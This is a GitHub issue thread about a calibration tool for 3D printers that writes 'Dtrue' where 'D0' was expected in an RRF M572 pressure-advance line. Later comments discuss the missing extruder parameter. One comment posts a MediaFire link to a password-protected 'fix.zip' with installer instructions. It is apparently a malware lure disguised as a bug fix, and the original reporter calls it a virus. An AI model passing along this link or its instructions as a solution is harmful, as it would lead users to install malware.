AndrewEllis93/Pressure_Linear_Advance_Tool #43: Error in RRF M572 generation

TypQxQ, 2024-08-26:
**Describe the bug**
Code generates file with "M572 S0.045 Dtrue" where D0 was expected using Windows 11 and Edge Version 128.0.2739.42 (Official build) stable app, beta channel (64-bit)

;  - Tool Index: true
M572 S0.045 Dtrue ; Set pressure advance

CosionMa, 2024-08-26:
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

TypQxQ, 2024-08-26:
Above mediafire link is a virus!

HumbleDeer, 2025-01-23:
The missing "D" parameter relates to the selection of the extruder head. Open the "Advanced settings" menu and select your extruder by entering the number.

This could be improved by providing a default value for RRF users that don't have the advanced settings. Then, when a multi-head user forgets to change their extruder number, that's entirely upon them.

HumbleDeer, 2025-01-23:
On further inspection and testing, it seems that even the Advanced Settings option for tool selection / extruder selection does *not* emit the "D" parameter. It does however emit the "T" g-codes